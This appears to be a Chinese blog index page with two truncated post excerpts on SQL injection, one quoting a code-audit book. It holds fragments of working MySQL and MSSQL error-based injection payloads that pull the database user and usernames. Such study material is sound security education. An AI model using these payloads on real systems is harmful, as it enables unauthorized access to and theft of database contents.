摘要:
以下均摘自《代码审计:企业级Web代码安全架构》一书 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from informati 阅读全文
摘要:
' and db_name()>1 ' and 0=(SELECT top 1 username FROM table) and 'C'='C ' and 0=(SELECT top 1 username FROM table FOR XML PATH(''))--+- ' and 1=(selec 阅读全文